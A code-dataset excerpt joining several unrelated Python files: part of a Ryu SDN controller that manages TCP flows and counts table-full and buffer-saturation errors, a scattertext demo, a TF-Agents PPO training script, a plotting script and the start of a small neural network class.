#print "flow already created:", flow_list[i]
return True
else:
i = i +1
return False
finally:
lock.release()
def check_pair(self, flow, datapath):
global flow_list
global lock
lock.acquire()
try:
i=0
while (i < len(flow_list)):
if ( (flow.src == flow_list[i].dst) and (flow.dst == flow_list[i].src) and (flow.tcp_src == flow_list[i].tcp_dst) and (flow.tcp_dst == flow_list[i].tcp_src) ):
print "pair flow found:", flow_list[i]
flow_removed = flow_list.pop(i)
match_del = flow_removed.match
self.remove_flow(datapath, match_del)
#print "List initial size:", len(flow_list)
print "PAIR FLOW REMOVED!!!!!:", match_del
#print "List final size:", len(flow_list)
return True
else:
i = i +1
return False
finally:
lock.release()
def check_pair2(self, ip_src, ip_dst, tcp_src, tcp_dst, datapath):
global flow_list
global lock
#print ip_src, ip_dst, tcp_src, tcp_dst
lock.acquire()
try:
i=0
while (i < len(flow_list)):
if ( (ip_src == flow_list[i].dst) and (ip_dst == flow_list[i].src) and (tcp_src == flow_list[i].tcp_dst) and (tcp_dst == flow_list[i].tcp_src) ):
print "pair flow found:", flow_list[i]
flow_removed = flow_list.pop(i)
match_del = flow_removed.match
self.remove_flow(datapath, match_del)
#print "List initial size:", len(flow_list)
print "PAIR FLOW REMOVED!!!!!:", match_del
#print "List final size:", len(flow_list)
return True
else:
i = i +1
return False
finally:
lock.release()
def remove_flow_list(self, src, dst):
global flow_list
global lock
lock.acquire()
try:
#print "List initial size into remove_flow_list:", len(flow_list)
i=0
while (i < len(flow_list)):
if ( (src == flow_list[i].src) and (dst == flow_list[i].dst)):
#print flow_list[i]
del flow_list[i]
#print "List final size into remove_flow_list:", len(flow_list)
else:
i = i + 1
finally:
lock.release()
def add_Cflow(self, datapath, priority, match, actions, buffer_id=None):
global flow_list
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,
actions)]
if buffer_id:
mod = parser.OFPFlowMod(datapath=datapath, buffer_id=buffer_id,
priority=priority, match=match,
instructions=inst)
else:
mod = parser.OFPFlowMod(datapath=datapath, priority=priority,
match=match, instructions=inst)
datapath.send_msg(mod)
self.logger.info("controller flow created")
def add_flow(self, datapath, priority, match, actions, pkt_ip=None,pkt_ethernet=None, pkt_tcp=None, idle_timeout=None, hard_timeout=None, buffer_id=None):
if pkt_tcp is None:
print 'NAO eh TCP (add_flow)!!!'
return
global flow_list
global pmod
global lock
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
source_ip = pkt_ip.src
destination_ip = pkt_ip.dst
tcp_src = pkt_tcp.src_port
tcp_dst = pkt_tcp.dst_port
new_flow = Flow(src=source_ip, dst=destination_ip, tcp_src=tcp_src, tcp_dst=tcp_dst, time_in=datetime.now(), match=match)
'''found = self.check_flow(new_flow)
if (found == True):
print "List final size:", len(flow_list)
return'''
inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS, actions)]
if buffer_id:
mod = parser.OFPFlowMod(datapath=datapath, buffer_id=buffer_id,
priority=priority, match=match,
idle_timeout=idle_timeout, hard_timeout=hard_timeout,
instructions=inst, flags=ofproto.OFPFF_SEND_FLOW_REM)
else:
mod = parser.OFPFlowMod(datapath=datapath, priority=priority,
idle_timeout=idle_timeout, hard_timeout=hard_timeout,
match=match, instructions=inst, flags=ofproto.OFPFF_SEND_FLOW_REM)
datapath.send_msg(mod)
incrcounterFlowMod(1)
'''lock.acquire()
try:
flow_list.append(new_flow)
self.logger.info("flow created and added to the list (add_flow)")
print "List final size:", len(flow_list)
finally:
lock.release()'''
found = self.check_flow(new_flow)
lock.acquire()
try:
if (found == False):
flow_list.append(new_flow)
#self.logger.info("flow created and added to the list")
#print "Match: ", new_flow.match
#print "List final size:", len(flow_list)
finally:
lock.release()
def caracterizar_flow(self, datapath, in_port, out_port, actions, pkt_ip, pkt_ethernet, pkt_tcp=None, buffer_id=None):
if pkt_tcp is None:
return
parser = datapath.ofproto_parser
ipv4_src = pkt_ip.src
ipv4_dst = pkt_ip.dst
eth_dst = pkt_ethernet.dst
eth_src = pkt_ethernet.src
tcp_src = pkt_tcp.src_port
tcp_dst = pkt_tcp.dst_port
match = parser.OFPMatch(in_port=in_port,
eth_type=ether.ETH_TYPE_IP,
ip_proto=inet.IPPROTO_TCP,
eth_dst=eth_dst,
ipv4_src=ipv4_src,
ipv4_dst=ipv4_dst,
tcp_src=tcp_src,
tcp_dst=tcp_dst)
'''actions = [parser.OFPActionSetField(ipv4_src=ipv4_src), #[parser.OFPActionSetField(eth_dst=eth_dst),
parser.OFPActionSetField(ipv4_dst=ipv4_dst),
parser.OFPActionSetField(tcp_src=tcp_src),
parser.OFPActionSetField(tcp_dst=tcp_dst),
parser.OFPActionOutput(out_port)]'''
if buffer_id:
self.add_flow(datapath, 1, match, actions, pkt_ip, pkt_ethernet, pkt_tcp, IDLE_TIME, HARD_TIME, buffer_id)
else:
self.add_flow(datapath, 1, match, actions, pkt_ip, pkt_ethernet, pkt_tcp, IDLE_TIME, HARD_TIME)
#self.add_flow(datapath, 1, match, actions, pkt_ip, pkt_ethernet, pkt_tcp, IDLE_TIME, HARD_TIME)
return actions
def remove_flow(self, datapath, match_del):
#self.logger.info("into remove_flow")
instructions = []
ofproto = datapath.ofproto
flow_mod = datapath.ofproto_parser.OFPFlowMod(datapath, 0, 0,
0,
ofproto.OFPFC_DELETE,
0,
0,
1,
ofproto.OFPCML_NO_BUFFER,
ofproto.OFPP_ANY,
ofproto.OFPG_ANY, 0,
match_del, instructions)
#self.logger.info("before remove flow_mod")
datapath.send_msg(flow_mod)
#self.logger.info("flow removed from the controller")
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
if ev.msg.msg_len < ev.msg.total_len:
self.logger.info("packet truncated: only %s of %s bytes", ev.msg.msg_len, ev.msg.total_len)
incrcounterIn(1)
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
in_port = msg.match['in_port']
pkt = packet.Packet(msg.data)
eth = pkt.get_protocols(ethernet.ethernet)[0]
dst = eth.dst
src = eth.src
pkt_ip = pkt.get_protocol(ipv4.ipv4)
pkt_tcp = pkt.get_protocol(tcp.tcp)
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info("packet in %s %s %s %s", dpid, src, dst, in_port)
# learn a mac address to avoid FLOOD next time.
self.mac_to_port[dpid][src] = in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
actions = [parser.OFPActionOutput(out_port)]
if out_port != ofproto.OFPP_FLOOD:
match = parser.OFPMatch(in_port=in_port,eth_dst=dst)
if pkt_tcp is not None:
#self.logger.info("Teste 2 - tcp packet")
if msg.buffer_id != ofproto.OFP_NO_BUFFER:
incrcounterInR(1)
self.logger.info("Existe buffer_id %s", msg.buffer_id)
self.caracterizar_flow(datapath, in_port, out_port, actions, pkt_ip,
eth, pkt_tcp=pkt_tcp, buffer_id = msg.buffer_id)
return
else:
incrcounterInR(1)
self.logger.info("Nao existe buffer_id")
self.caracterizar_flow(datapath, in_port, out_port, actions, pkt_ip,
eth, pkt_tcp=pkt_tcp)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
print "buffer_id == OFP_NO_BUFFER"
data = msg.data
out = parser.OFPPacketOut(datapath=datapath, buffer_id=msg.buffer_id,
in_port=in_port, actions=actions, data=data)
if out is None:
self.logger.info("out is None")
else:
self.logger.info("out is not None")
datapath.send_msg(out)
#self.logger.info("after send_msg in packet in")
@set_ev_cls(ofp_event.EventOFPFlowRemoved, MAIN_DISPATCHER)
def flow_removed_handler(self, ev):
global flow_list
msg = ev.msg
dp = msg.datapath
ofp = dp.ofproto
ip_src = msg.match['ipv4_src']
ip_dst = msg.match['ipv4_dst']
if msg.reason == ofp.OFPRR_IDLE_TIMEOUT:
reason = 'IDLE TIMEOUT'
elif msg.reason == ofp.OFPRR_HARD_TIMEOUT:
reason = 'HARD TIMEOUT'
elif msg.reason == ofp.OFPRR_DELETE:
reason = 'DELETE'
elif msg.reason == ofp.OFPRR_GROUP_DELETE:
reason = 'GROUP DELETE'
else:
reason = 'unknown'
print "Deletado: ", reason
print "Match: ", msg.match
if ( (reason == 'IDLE TIMEOUT') or (reason == 'HARD TIMEOUT') ):
self.remove_flow_list(ip_src, ip_dst)
#print 'Deletado da lista!'
def send_table_stats_request(self, datapath):
ofp_parser = datapath.ofproto_parser
req = ofp_parser.OFPTableStatsRequest(datapath, 0)
datapath.send_msg(req)
@set_ev_cls(ofp_event.EventOFPTableStatsReply, MAIN_DISPATCHER)
def table_stats_reply_handler(self, ev):
#tables = []
table_id = ev.msg.body[0].table_id
active_count = ev.msg.body[0].active_count
self.logger.info("table_id: %d", table_id)
self.logger.info("active_count: %d", active_count)
#Recebe evento de erro
@set_ev_cls(ofp_event.EventOFPErrorMsg, [HANDSHAKE_DISPATCHER, CONFIG_DISPATCHER, MAIN_DISPATCHER])
def error_msg_handler(self, ev):
global flow_list
global pmod
global lock
msg = ev.msg
self.logger.info('OFPErrorMsg received: type=0x%02x code=0x%02x '
'message=%s',
msg.type, msg.code, utils.hex_array(msg.data))
if (msg.type == 1):
if (msg.code == 8):
print "BUFFER UNKNOW - SATURATION ATTACK"
incrcounterB(1)
if (msg.type == 5):
if (msg.code == 1):
print "TABLE IS FULL!!!!!!!!!!!!!!"
incrcounterF(1)
self.flows_request_stats(msg.datapath)
#self.send_table_stats_request(msg.datapath)
def flows_request_stats(self, datapath):
self.logger.debug('send stats request: %016x', datapath.id)
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
req = parser.OFPFlowStatsRequest(datapath)
datapath.send_msg(req)
req = parser.OFPPortStatsRequest(datapath, 0, ofproto.OFPP_ANY)
datapath.send_msg(req)
@set_ev_cls(ofp_event.EventOFPFlowStatsReply, MAIN_DISPATCHER)
def _flow_stats_reply_handler(self, ev):
body = ev.msg.body
sorted_list = sorted([flow for flow in body if flow.priority == 1],
key=lambda flow: (flow.packet_count))
''' print sorted_list[0]
print sorted_list[0].match['ipv4_src']
print sorted_list[0].match['ipv4_dst']
print sorted_list[0].match['tcp_src']
print sorted_list[0].match['tcp_dst']'''
self.check_pair2(sorted_list[0].match['ipv4_src'], sorted_list[0].match['ipv4_dst'],
sorted_list[0].match['tcp_src'], sorted_list[0].match['tcp_dst'],
ev.msg.datapath)
self.remove_flow(ev.msg.datapath, sorted_list[0].match)
'''for stat in sorted([flow for flow in body if flow.priority == 1],
key=lambda flow: (flow.byte_count)):
#self.logger.info('%8d %8d', stat.packet_count/stat.duration_sec, stat.byte_count/stat.duration_sec)
#print stat
#print flow
self.logger.info('%8d %8d %8d %8d', stat.packet_count, stat.byte_count, stat.length, stat.duration_sec)
#self.remove_flow(ev.msg.datapath, flow.match)'''
'''
def send_port_stats_request(self, datapath):
ofp = datapath.ofproto
ofp_parser = datapath.ofproto_parser
req = ofp_parser.OFPPortStatsRequest(datapath, 0, ofp.OFPP_ANY)
datapath.send_msg(req)
@set_ev_cls(ofp_event.EventOFPPortStatsReply, MAIN_DISPATCHER)
def port_stats_reply_handler(self, ev):
ports = []
for stat in ev.msg.body:
ports.append('port_no=%d '
'rx_packets=%d tx_packets=%d '
'rx_bytes=%d tx_bytes=%d '
'rx_dropped=%d tx_dropped=%d '
'rx_errors=%d tx_errors=%d '
'rx_frame_err=%d rx_over_err=%d rx_crc_err=%d '
'collisions=%d duration_sec=%d duration_nsec=%d' %
(stat.port_no,
stat.rx_packets, stat.tx_packets,
stat.rx_bytes, stat.tx_bytes,
stat.rx_dropped, stat.tx_dropped,
stat.rx_errors, stat.tx_errors,
stat.rx_frame_err, stat.rx_over_err,
stat.rx_crc_err, stat.collisions,
stat.duration_sec, stat.duration_nsec))
self.logger.info('PortStats: %s', ports)
''' | 30.838129 | 221 | 0.679109 |
95d5dcabb81b8e0db6319835f05176cb715b99f0 | 1,069 | py | Python | demo_dispersion_basic.py | jairoruizsaenz/scattertext | 5d96f62434057cc26ed90a1d0b314984e4ef90f8 | [
"Apache-2.0"
] | 1,823 | 2016-07-28T00:25:56.000Z | 2022-03-30T12:33:57.000Z | demo_dispersion_basic.py | jairoruizsaenz/scattertext | 5d96f62434057cc26ed90a1d0b314984e4ef90f8 | [
"Apache-2.0"
] | 92 | 2016-07-28T23:13:20.000Z | 2022-01-24T03:53:38.000Z | demo_dispersion_basic.py | jairoruizsaenz/scattertext | 5d96f62434057cc26ed90a1d0b314984e4ef90f8 | [
"Apache-2.0"
] | 271 | 2016-12-26T12:56:08.000Z | 2022-03-24T19:35:13.000Z | import statsmodels.api as sm
from sklearn.neighbors import KNeighborsRegressor
import scattertext as st
df = st.SampleCorpora.ConventionData2012.get_data().assign(
parse=lambda df: df.text.apply(st.whitespace_nlp_with_sentences)
)
corpus = st.CorpusWithoutCategoriesFromParsedDocuments(
df, parsed_col='parse'
).build().get_unigram_corpus().remove_infrequent_words(
minimum_term_count=6
)
dispersion = st.Dispersion(corpus)
dispersion_df = dispersion.get_df().assign(
X=lambda df: df.Frequency,
Xpos=lambda df: st.Scalers.log_scale(df.X),
Y=lambda df: dispersion.rosengrens(),
Ypos=lambda df: st.Scalers.scale(df.Y),
)
html = st.dataframe_scattertext(
corpus,
plot_df=dispersion_df,
metadata=corpus.get_df()['speaker'] + ' (' + corpus.get_df()['party'].str.upper() + ')',
ignore_categories=True,
x_label='Log Frequency',
y_label="Rosengren's S",
y_axis_labels=['More Dispersion', 'Medium', 'Less Dispersion'],
)
fn = 'demo_dispersion_basic.html'
open(fn, 'w').write(html)
print('open ./%s in Chrome' % fn)
| 28.131579 | 92 | 0.723106 |
ce2b2b3dc42eebfaa731ba6890341bd8e6fe6bcd | 15,253 | py | Python | tf_agents/experimental/examples/ppo/schulman17/train_eval_lib.py | ngroves08/agents | cdb7a94124a1bc756217ad868b1aa49c11dc26bf | [
"Apache-2.0"
] | 1 | 2021-04-19T02:28:24.000Z | 2021-04-19T02:28:24.000Z | tf_agents/experimental/examples/ppo/schulman17/train_eval_lib.py | ngroves08/agents | cdb7a94124a1bc756217ad868b1aa49c11dc26bf | [
"Apache-2.0"
] | null | null | null | tf_agents/experimental/examples/ppo/schulman17/train_eval_lib.py | ngroves08/agents | cdb7a94124a1bc756217ad868b1aa49c11dc26bf | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
r"""Train/eval PPOClipAgent in Mujoco environments with (Schulman, 17) methods.
To reproduce (Schulman, 17), here we collect fixed length sequences of
`collect_sequence_length` to store in the replay buffer and perform advantage
calculation on. Each sequence can span multiple episodes, separated by a
boundary step. Bootstraping occurs during advantage calculation for the partial
episodes that are part of the sequences.
Note that this isn't necessary. Alternatively, you could instead collect a
specified number of episodes in each training iteration. Each `item` stored in
Reverb tables is a full episode, and advantage calculation happens on full
episodes. As a result, no bootstrapping is required.
All hyperparameters come from the PPO paper
https://arxiv.org/abs/1707.06347.pdf
"""
import os
from absl import logging
import gin
import reverb
import tensorflow.compat.v2 as tf
from tf_agents.agents.ppo import ppo_actor_network
from tf_agents.agents.ppo import ppo_clip_agent
from tf_agents.environments import suite_mujoco
from tf_agents.metrics import py_metrics
from tf_agents.networks import value_network
from tf_agents.policies import py_tf_eager_policy
from tf_agents.replay_buffers import reverb_replay_buffer
from tf_agents.replay_buffers import reverb_utils
from tf_agents.train import actor
from tf_agents.train import learner
from tf_agents.train import ppo_learner
from tf_agents.train import triggers
from tf_agents.train.utils import spec_utils
from tf_agents.train.utils import train_utils
class ReverbFixedLengthSequenceObserver(
reverb_utils.ReverbAddTrajectoryObserver):
"""Reverb fixed length sequence observer.
This is a specialized observer similar to ReverbAddTrajectoryObserver but each
sequence contains a fixed number of steps and can span multiple episodes. This
implementation is consistent with (Schulman, 17).
**Note**: Counting of steps in drivers does not include boundary steps. To
guarantee only 1 item is pushed to the replay when collecting n steps with a
`sequence_length` of n make sure to set the `stride_length`.
"""
def __call__(self, trajectory):
"""Writes the trajectory into the underlying replay buffer.
Allows trajectory to be a flattened trajectory. No batch dimension allowed.
Args:
trajectory: The trajectory to be written which could be (possibly nested)
trajectory object or a flattened version of a trajectory. It assumes
there is *no* batch dimension.
"""
self._writer.append(trajectory)
self._cached_steps += 1
self._write_cached_steps()
@gin.configurable
def train_eval(
root_dir,
env_name='HalfCheetah-v2',
# Training params
num_iterations=1600,
actor_fc_layers=(64, 64),
value_fc_layers=(64, 64),
learning_rate=3e-4,
collect_sequence_length=2048,
minibatch_size=64,
num_epochs=10,
# Agent params
importance_ratio_clipping=0.2,
lambda_value=0.95,
discount_factor=0.99,
entropy_regularization=0.,
value_pred_loss_coef=0.5,
use_gae=True,
use_td_lambda_return=True,
gradient_clipping=0.5,
value_clipping=None,
# Replay params
reverb_port=None,
replay_capacity=10000,
# Others
policy_save_interval=5000,
summary_interval=1000,
eval_interval=10000,
eval_episodes=100,
debug_summaries=False,
summarize_grads_and_vars=False):
"""Trains and evaluates PPO (Importance Ratio Clipping).
Args:
root_dir: Main directory path where checkpoints, saved_models, and summaries
will be written to.
env_name: Name for the Mujoco environment to load.
num_iterations: The number of iterations to perform collection and training.
actor_fc_layers: List of fully_connected parameters for the actor network,
where each item is the number of units in the layer.
value_fc_layers: : List of fully_connected parameters for the value network,
where each item is the number of units in the layer.
learning_rate: Learning rate used on the Adam optimizer.
collect_sequence_length: Number of steps to take in each collect run.
minibatch_size: Number of elements in each mini batch. If `None`, the entire
collected sequence will be treated as one batch.
num_epochs: Number of iterations to repeat over all collected data per data
collection step. (Schulman,2017) sets this to 10 for Mujoco, 15 for
Roboschool and 3 for Atari.
importance_ratio_clipping: Epsilon in clipped, surrogate PPO objective. For
more detail, see explanation at the top of the doc.
lambda_value: Lambda parameter for TD-lambda computation.
discount_factor: Discount factor for return computation. Default to `0.99`
which is the value used for all environments from (Schulman, 2017).
entropy_regularization: Coefficient for entropy regularization loss term.
Default to `0.0` because no entropy bonus was used in (Schulman, 2017).
value_pred_loss_coef: Multiplier for value prediction loss to balance with
policy gradient loss. Default to `0.5`, which was used for all
environments in the OpenAI baseline implementation. This parameters is
irrelevant unless you are sharing part of actor_net and value_net. In that
case, you would want to tune this coeeficient, whose value depends on the
network architecture of your choice.
use_gae: If True (default False), uses generalized advantage estimation for
computing per-timestep advantage. Else, just subtracts value predictions
from empirical return.
use_td_lambda_return: If True (default False), uses td_lambda_return for
training value function; here: `td_lambda_return = gae_advantage +
value_predictions`. `use_gae` must be set to `True` as well to enable TD
-lambda returns. If `use_td_lambda_return` is set to True while
`use_gae` is False, the empirical return will be used and a warning will
be logged.
gradient_clipping: Norm length to clip gradients.
value_clipping: Difference between new and old value predictions are clipped
to this threshold. Value clipping could be helpful when training
very deep networks. Default: no clipping.
reverb_port: Port for reverb server, if None, use a randomly chosen unused
port.
replay_capacity: The maximum number of elements for the replay buffer. Items
will be wasted if this is smalled than collect_sequence_length.
policy_save_interval: How often, in train_steps, the policy will be saved.
summary_interval: How often to write data into Tensorboard.
eval_interval: How often to run evaluation, in train_steps.
eval_episodes: Number of episodes to evaluate over.
debug_summaries: Boolean for whether to gather debug summaries.
summarize_grads_and_vars: If true, gradient summaries will be written.
"""
collect_env = suite_mujoco.load(env_name)
eval_env = suite_mujoco.load(env_name)
num_environments = 1
observation_tensor_spec, action_tensor_spec, time_step_tensor_spec = (
spec_utils.get_tensor_specs(collect_env))
# TODO(b/172267869): Remove this conversion once TensorNormalizer stops
# converting float64 inputs to float32.
observation_tensor_spec = tf.TensorSpec(
dtype=tf.float32, shape=observation_tensor_spec.shape)
train_step = train_utils.create_train_step()
actor_net = ppo_actor_network.create_sequential_actor_net(
actor_fc_layers, action_tensor_spec)
value_net = value_network.ValueNetwork(
observation_tensor_spec,
fc_layer_params=value_fc_layers,
kernel_initializer=tf.keras.initializers.Orthogonal())
current_iteration = tf.Variable(0, dtype=tf.int64)
def learning_rate_fn():
# Linearly decay the learning rate.
return learning_rate * (1 - current_iteration / num_iterations)
agent = ppo_clip_agent.PPOClipAgent(
time_step_tensor_spec,
action_tensor_spec,
optimizer=tf.compat.v1.train.AdamOptimizer(
learning_rate=learning_rate_fn, epsilon=1e-5),
actor_net=actor_net,
value_net=value_net,
importance_ratio_clipping=importance_ratio_clipping,
lambda_value=lambda_value,
discount_factor=discount_factor,
entropy_regularization=entropy_regularization,
value_pred_loss_coef=value_pred_loss_coef,
# This is a legacy argument for the number of times we repeat the data
# inside of the train function, incompatible with mini batch learning.
# We set the epoch number from the replay buffer and tf.Data instead.
num_epochs=1,
use_gae=use_gae,
use_td_lambda_return=use_td_lambda_return,
gradient_clipping=gradient_clipping,
value_clipping=value_clipping,
# TODO(b/150244758): Default compute_value_and_advantage_in_train to False
# after Reverb open source.
compute_value_and_advantage_in_train=False,
# Skips updating normalizers in the agent, as it's handled in the learner.
update_normalizers_in_train=False,
debug_summaries=debug_summaries,
summarize_grads_and_vars=summarize_grads_and_vars,
train_step_counter=train_step)
agent.initialize()
reverb_server = reverb.Server(
[
reverb.Table( # Replay buffer storing experience for training.
name='training_table',
sampler=reverb.selectors.Fifo(),
remover=reverb.selectors.Fifo(),
rate_limiter=reverb.rate_limiters.MinSize(1),
max_size=replay_capacity,
max_times_sampled=1,
),
reverb.Table( # Replay buffer storing experience for normalization.
name='normalization_table',
sampler=reverb.selectors.Fifo(),
remover=reverb.selectors.Fifo(),
rate_limiter=reverb.rate_limiters.MinSize(1),
max_size=replay_capacity,
max_times_sampled=1,
)
],
port=reverb_port)
# Create the replay buffer.
reverb_replay_train = reverb_replay_buffer.ReverbReplayBuffer(
agent.collect_data_spec,
sequence_length=collect_sequence_length,
table_name='training_table',
server_address='localhost:{}'.format(reverb_server.port),
# The only collected sequence is used to populate the batches.
max_cycle_length=1,
rate_limiter_timeout_ms=1000)
reverb_replay_normalization = reverb_replay_buffer.ReverbReplayBuffer(
agent.collect_data_spec,
sequence_length=collect_sequence_length,
table_name='normalization_table',
server_address='localhost:{}'.format(reverb_server.port),
# The only collected sequence is used to populate the batches.
max_cycle_length=1,
rate_limiter_timeout_ms=1000)
rb_observer = ReverbFixedLengthSequenceObserver(
reverb_replay_train.py_client, ['training_table', 'normalization_table'],
sequence_length=collect_sequence_length,
stride_length=collect_sequence_length)
saved_model_dir = os.path.join(root_dir, learner.POLICY_SAVED_MODEL_DIR)
collect_env_step_metric = py_metrics.EnvironmentSteps()
learning_triggers = [
triggers.PolicySavedModelTrigger(
saved_model_dir,
agent,
train_step,
interval=policy_save_interval,
metadata_metrics={
triggers.ENV_STEP_METADATA_KEY: collect_env_step_metric
}),
triggers.StepPerSecondLogTrigger(train_step, interval=summary_interval),
]
def training_dataset_fn():
return reverb_replay_train.as_dataset(
sample_batch_size=num_environments,
sequence_preprocess_fn=agent.preprocess_sequence)
def normalization_dataset_fn():
return reverb_replay_normalization.as_dataset(
sample_batch_size=num_environments,
sequence_preprocess_fn=agent.preprocess_sequence)
agent_learner = ppo_learner.PPOLearner(
root_dir,
train_step,
agent,
experience_dataset_fn=training_dataset_fn,
normalization_dataset_fn=normalization_dataset_fn,
num_batches=1,
num_epochs=num_epochs,
minibatch_size=minibatch_size,
shuffle_buffer_size=collect_sequence_length,
triggers=learning_triggers)
tf_collect_policy = agent.collect_policy
collect_policy = py_tf_eager_policy.PyTFEagerPolicy(
tf_collect_policy, use_tf_function=True)
collect_actor = actor.Actor(
collect_env,
collect_policy,
train_step,
steps_per_run=collect_sequence_length,
observers=[rb_observer],
metrics=actor.collect_metrics(buffer_size=10) + [collect_env_step_metric],
reference_metrics=[collect_env_step_metric],
summary_dir=os.path.join(root_dir, learner.TRAIN_DIR),
summary_interval=summary_interval)
eval_greedy_policy = py_tf_eager_policy.PyTFEagerPolicy(
agent.policy, use_tf_function=True)
if eval_interval:
logging.info('Intial evaluation.')
eval_actor = actor.Actor(
eval_env,
eval_greedy_policy,
train_step,
metrics=actor.eval_metrics(eval_episodes),
reference_metrics=[collect_env_step_metric],
summary_dir=os.path.join(root_dir, 'eval'),
episodes_per_run=eval_episodes)
eval_actor.run_and_log()
logging.info('Training on %s', env_name)
last_eval_step = 0
for i in range(num_iterations):
collect_actor.run()
# TODO(b/159615593): Update to use observer.flush.
# Reset the reverb observer to make sure the data collected is flushed and
# written to the RB.
# At this point, there a small number of steps left in the cache because the
# actor does not count a boundary step as a step, whereas it still gets
# added to Reverb for training. We throw away those extra steps without
# padding to align with the paper implementation which never collects them
# in the first place.
rb_observer.reset(write_cached_steps=False)
agent_learner.run()
reverb_replay_train.clear()
reverb_replay_normalization.clear()
current_iteration.assign_add(1)
# Eval only if `eval_interval` has been set. Then, eval if the current train
# step is equal or greater than the `last_eval_step` + `eval_interval` or if
# this is the last iteration. This logic exists because agent_learner.run()
# does not return after every train step.
if (eval_interval and
(agent_learner.train_step_numpy >= eval_interval + last_eval_step
or i == num_iterations - 1)):
logging.info('Evaluating.')
eval_actor.run_and_log()
last_eval_step = agent_learner.train_step_numpy
rb_observer.close()
reverb_server.stop()
| 41.224324 | 80 | 0.745427 |
ac84ac6f5a21a9ae4d4ad5893ff2485d4a7cbcc2 | 1,534 | py | Python | simulation_sequence/sequence_bottleneck/plot_overlap_eachpos.py | TatsuyaHaga/laplacian_associative_memory_codes | 74679a5bb6799090fe2aaf202ee6c7242e06e67f | [
"MIT"
] | 1 | 2021-07-26T08:28:10.000Z | 2021-07-26T08:28:10.000Z | simulation_sequence/sequence_overrepresentation/plot_overlap_eachpos.py | TatsuyaHaga/laplacian_associative_memory_codes | 74679a5bb6799090fe2aaf202ee6c7242e06e67f | [
"MIT"
] | null | null | null | simulation_sequence/sequence_overrepresentation/plot_overlap_eachpos.py | TatsuyaHaga/laplacian_associative_memory_codes | 74679a5bb6799090fe2aaf202ee6c7242e06e67f | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import sys
sys.path.append("../")
import plotlib
import numpy
import pylab
import networkx
import pickle
fname=sys.argv[1]
m_time=numpy.loadtxt(fname, delimiter=",")
m_time[m_time<0]=0.0
pos=numpy.loadtxt(sys.argv[2], delimiter=",").astype(int)
Npos=m_time.shape[1]
m_pos=numpy.zeros([Npos,Npos])
for i in range(Npos):
m_pos[i,:]=numpy.mean(m_time[pos==i,:], axis=0)
border1=30
border2=60
pylab.figure(figsize=(3,3))
pylab.imshow(m_pos.T, interpolation="none", cmap="jet")
pylab.plot([0,Npos-1],[border1,border1], "--", color="white")
pylab.plot([0,Npos-1],[border2,border2], "--", color="white")
pylab.plot([border1,border1], [0,Npos-1],"--", color="white")
pylab.plot([border2,border2], [0,Npos-1],"--", color="white")
pylab.xticks([])
pylab.yticks([])
pylab.xlabel("Actual location")
pylab.ylabel("Represented location")
pylab.colorbar()
pylab.tight_layout()
pylab.savefig(fname.rstrip(".csv")+"_eachpos.pdf")
pylab.close()
cor_m=numpy.corrcoef(m_pos)
pylab.figure(figsize=(3,3))
pylab.imshow(cor_m, interpolation="none", cmap="jet")
pylab.plot([0,Npos-1],[border1,border1], "--", color="white", lw=1)
pylab.plot([0,Npos-1],[border2,border2], "--", color="white", lw=1)
pylab.plot([border1,border1], [0,Npos-1],"--", color="white", lw=1)
pylab.plot([border2,border2], [0,Npos-1],"--", color="white", lw=1)
pylab.xticks([])
pylab.yticks([])
pylab.xlabel("Location")
pylab.ylabel("Location")
pylab.colorbar()
pylab.tight_layout()
pylab.savefig(fname.rstrip(".csv")+"_eachpos_cor.pdf")
pylab.close()
| 27.890909 | 67 | 0.694263 |
bad518ea79c48bc372de1ccfa35157cc22fe1c8f | 67 | py | Python | src/utils/topo.py | mor1/reckon | 7b40ba79f90b5767430c0b8d90e6ea0c5b2a461b | [
"MIT"
] | 8 | 2021-03-30T12:28:33.000Z | 2022-02-08T06:36:14.000Z | src/utils/topo.py | mor1/reckon | 7b40ba79f90b5767430c0b8d90e6ea0c5b2a461b | [
"MIT"
] | 1 | 2021-04-12T16:18:00.000Z | 2021-04-12T16:18:00.000Z | src/utils/topo.py | mor1/reckon | 7b40ba79f90b5767430c0b8d90e6ea0c5b2a461b | [
"MIT"
] | 1 | 2021-03-29T21:38:19.000Z | 2021-03-29T21:38:19.000Z | def contain_in_cgroup(grp):
pid = os.getpid()
grp.add(pid)
| 16.75 | 27 | 0.641791 |
89ff519d08c81ec47e6b93e18e294013f02a6c24 | 3,592 | py | Python | 08_learning.py | vilas4485/Neural-Network-using-Scikit | 51bb537cdb02e902d0c47f94216f86efd71ee437 | [
"MIT"
] | 2 | 2018-05-04T16:07:26.000Z | 2018-11-17T00:07:38.000Z | 08_learning.py | vilas4485/Neural-Network-using-Scikit | 51bb537cdb02e902d0c47f94216f86efd71ee437 | [
"MIT"
] | null | null | null | 08_learning.py | vilas4485/Neural-Network-using-Scikit | 51bb537cdb02e902d0c47f94216f86efd71ee437 | [
"MIT"
] | 9 | 2018-03-06T13:53:56.000Z | 2022-02-23T13:50:57.000Z | import os
import numpy as np
import matplotlib.pyplot as plt
from mnist import load_mnist
from functions import *
class TwoLayerNet:
def __init__(self, input_size, hidden_size, output_size, weight_init_std=0.01):
self.params = {}
self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size)
self.params['b1'] = np.zeros(hidden_size)
